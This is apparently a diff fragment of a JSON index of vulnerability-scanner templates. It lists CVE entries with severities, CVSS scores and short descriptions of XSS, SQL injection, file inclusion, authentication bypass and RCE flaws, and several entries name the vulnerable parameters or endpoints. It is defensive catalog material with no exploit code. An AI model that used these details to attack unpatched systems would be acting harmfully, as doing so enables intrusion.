{"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-4513.yaml"} {"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-4513.yaml"}
{"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4535.yaml"} {"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4535.yaml"}
{"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4536.yaml"} {"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4536.yaml"}
@ -271,6 +271,7 @@
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"}
{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
@ -624,6 +625,7 @@
{"ID":"CVE-2018-8719","Info":{"Name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8719.yaml"} {"ID":"CVE-2018-8719","Info":{"Name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8719.yaml"}
{"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-8727.yaml"} {"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-8727.yaml"}
{"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 - Information Disclosure","Severity":"medium","Description":"Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8770.yaml"} {"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 - Information Disclosure","Severity":"medium","Description":"Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8770.yaml"}
{"ID":"CVE-2018-8823","Info":{"Name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","Severity":"critical","Description":"The 'Responsive Mega Menu' module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-8823.yaml"}
{"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9118.yaml"} {"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9118.yaml"}
{"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-9161.yaml"} {"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-9161.yaml"}
{"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9205.yaml"} {"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9205.yaml"}
@ -1088,7 +1090,7 @@
{"ID":"CVE-2021-22005","Info":{"Name":"VMware vCenter Server - Arbitrary File Upload","Severity":"critical","Description":"VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22005.yaml"} {"ID":"CVE-2021-22005","Info":{"Name":"VMware vCenter Server - Arbitrary File Upload","Severity":"critical","Description":"VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22005.yaml"}
{"ID":"CVE-2021-22053","Info":{"Name":"Spring Cloud Netflix Hystrix Dashboard \u003c2.2.10 - Remote Code Execution","Severity":"high","Description":"Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-22053.yaml"} {"ID":"CVE-2021-22053","Info":{"Name":"Spring Cloud Netflix Hystrix Dashboard \u003c2.2.10 - Remote Code Execution","Severity":"high","Description":"Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-22053.yaml"}
{"ID":"CVE-2021-22054","Info":{"Name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","Severity":"high","Description":"VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-22054.yaml"} {"ID":"CVE-2021-22054","Info":{"Name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","Severity":"high","Description":"VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-22054.yaml"}
{"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross-Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22122.yaml"} {"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22122.yaml"}
{"ID":"CVE-2021-22145","Info":{"Name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","Severity":"medium","Description":"ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-22145.yaml"} {"ID":"CVE-2021-22145","Info":{"Name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","Severity":"medium","Description":"ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-22145.yaml"}
{"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"} {"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"}
{"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"} {"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"}
@ -1257,6 +1259,7 @@
{"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"} {"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"}
{"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"} {"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"}
{"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"} {"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"}
{"ID":"CVE-2021-29200","Info":{"Name":"Apache OFBiz \u003c 17.12.07 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29200.yaml"}
{"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"} {"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"}
{"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"} {"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"}
{"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29442.yaml"} {"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29442.yaml"}
@ -1344,7 +1347,7 @@
{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"} {"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"}
{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"} {"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"}
{"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"} {"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"}
